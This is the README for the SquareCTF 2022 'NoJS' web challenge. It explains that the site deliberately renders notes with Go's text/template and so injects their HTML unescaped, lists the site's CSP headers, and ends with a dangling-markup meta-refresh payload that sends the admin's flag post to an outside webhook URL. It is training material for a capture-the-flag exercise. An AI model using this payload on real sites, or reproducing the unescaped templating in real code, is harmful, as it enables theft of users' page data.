
Source for the SquareCTF NoJS (Web 400) challenge.


No-JS

Square 2022 Web CTF challenge

Description

Reverting back to the ye-olde days, absolutely no javascript is allowed on my pure site. No vulnerabilities allowed here, no sir!

Notes

The flag is stored as a post on the admin user's profile. When you share a note with the admin, it is rendered on the same page as that post ("/"), and the admin bot will then visit that page.

The site (intentionally) uses Go's text/template package instead of html/template. text/template substitutes values verbatim and performs no contextual escaping, so any HTML a user puts in a note is injected into the page as-is. The site also sets the following security headers:

Content-Security-Policy: "default-src 'self'; script-src 'none'"
X-XSS-Protection: 0
X-Content-Type-Options: "nosniff"
X-Frame-Options: "sameorigin"

This has the following (important to note) consequences:

  1. No JavaScript is allowed to execute at all on the page (script-src 'none').
  2. 'unsafe-inline' isn't set, and there is no style-src, so style-src falls back to default-src 'self'; inline <style></style> tags (and style attributes) are therefore blocked as well.

The flag is in the admin post below. To leak the post, you can use dangling markup injection: an unclosed attribute quote swallows the HTML that follows it (including the post) into a URL, as follows:

<meta http-equiv="refresh" content='0; url=https://webhook.site/#!/your_webhook_site_id?